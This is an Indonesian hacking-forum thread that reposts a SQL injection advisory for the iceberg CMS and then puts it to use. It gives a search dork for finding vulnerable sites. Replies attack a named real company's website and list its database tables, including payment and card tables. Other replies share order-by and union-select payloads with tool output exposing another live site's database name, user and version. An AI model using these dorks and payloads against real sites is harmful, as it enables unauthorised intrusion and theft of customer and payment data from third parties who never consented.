[Bug]SQL injection pada iceberg 'Content Management System'
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
[Bug]SQL injection pada iceberg 'Content Management System'
The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms
==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================
# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a
antisecurity [ pinjem script perl-na ] ,
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U
Give me NOCAN Brothers
am nt hacker just Lik3 Syst3m S3curity
References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms
==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================
# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a
antisecurity [ pinjem script perl-na ] ,
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U
Give me NOCAN Brothers
am nt hacker just Lik3 Syst3m S3curity
References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
idih bang poni emg kga ada matinya daah :love:
thanks pak
thanks pak
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
Diatas adalah salah satu bug sql injection yang ditemukan oleh cyberlog dari forum saudara kita sekuritionline, pada produk CMS imagetrader milik iceberg. sebagai POC, mari lihat web dibawah ini:
dan setelah dicek, ditemukan:
Selanjutnya silahkan anda pelajari sendiri.
Code: Select all
http://www.wielandhelicopters.com.au/details.php?p_id=62'
Code: Select all
database = wiehel1_wielandhelicopters0com0au
dan terdiri dari tabel
e_c
e_cc
e_answer
e_account_payment
db_backup
cover
cost_title
cost_sub_title
cost_detail
content_template
content_option
content_config
contact_thank
contact_show
contact_paragraph
contact_page
contact_location
contact_field
contact
colour_font_help
cms_user_type
cms_user_group
cms_plugin_option
cms_plugin
client_secondary
client_pdf_folder
client_pdf
client_note
client_image
client_file
client_enquiry
client_category_email
client_category
client
cli_enquiry_answer
cli_enquiry
cart_product
cart_payment_type
cart_payment_paypal
cart_payment_cc
cart_payment_bankdep
cart_payment
cart_option
cart_history
cart_config
cart
calendar_users
calendar_property
calendar_param
calendar_link
calendar_info_day
calendar_info
calendar_events
calendar_content
calendar_cat
business_location
booking_travellers
booking_package
booking_note
booking_meal
booking_item
booking_files
booking_fees
booking_email
booking
bo_paragraph
bo_help_plugin_paragraph
bo_help_option_paragraph
banner_image
banner
as_group
as_field
as_answer
agents
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
Injin dipelajari Kk poni........
............make a wish............
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
Oh tidaaakkk... :pusing:poni wrote: dan setelah dicek, ditemukan:Code: Select all
database = wiehel1_wielandhelicopters0com0au dan terdiri dari tabel cart_product cart_payment_type cart_payment_paypal cart_payment_cc cart_payment_bankdep cart_payment cart_option cart_history cart_config
Ya Tuhan kuatkanlah hatiku...
Nice share Master PONI... :love:
...n0 l1m17...
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
mantap kk, ijin eksplorasi :love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
ane baru dapet kek bgini....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
tp kalo gini
http://www.target.com.au/details.php?p_id=269 order by 2-- (kok error yah)
mohon pencerahannya :mati: :mati:
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
tp kalo gini
http://www.target.com.au/details.php?p_id=269 order by 2-- (kok error yah)
mohon pencerahannya :mati: :mati:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
santapan lezattttt.. :tapa: :tapa:
huwahahaha.. :ngakak: :ngakak:
huwahahaha.. :ngakak: :ngakak:
[url=http://www.signaturebar.com/][img]http://www.signaturebar.com/uploads/images/30656.gif[/img][/url]
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
hwa akhirna berhasil nemu satu.... hanya dengan memperhatikan jenis error saja jumlah colom bisa ketemu :devil :devil
CMIIW :love: :love:
Code: Select all
URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: imatra_imagetraders0com0au
User: imatra_cms@localhost
Version: 5.0.90-community
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
- abit doang
- Posts: 212
- Joined: Wed Mar 19, 2008 3:51 pm
- Location: cd ../
- Contact:
Re: [Bug]SQL injection pada iceberg 'Content Management Syst
nice,...
hajar pake fuzz aja ah,..
maklum nubi...
:tapa:
hajar pake fuzz aja ah,..
maklum nubi...
:tapa:
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin..
http://abid912.wordpress.com/
http://maniak-online.blogspot.com/
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin..
http://abid912.wordpress.com/
http://maniak-online.blogspot.com/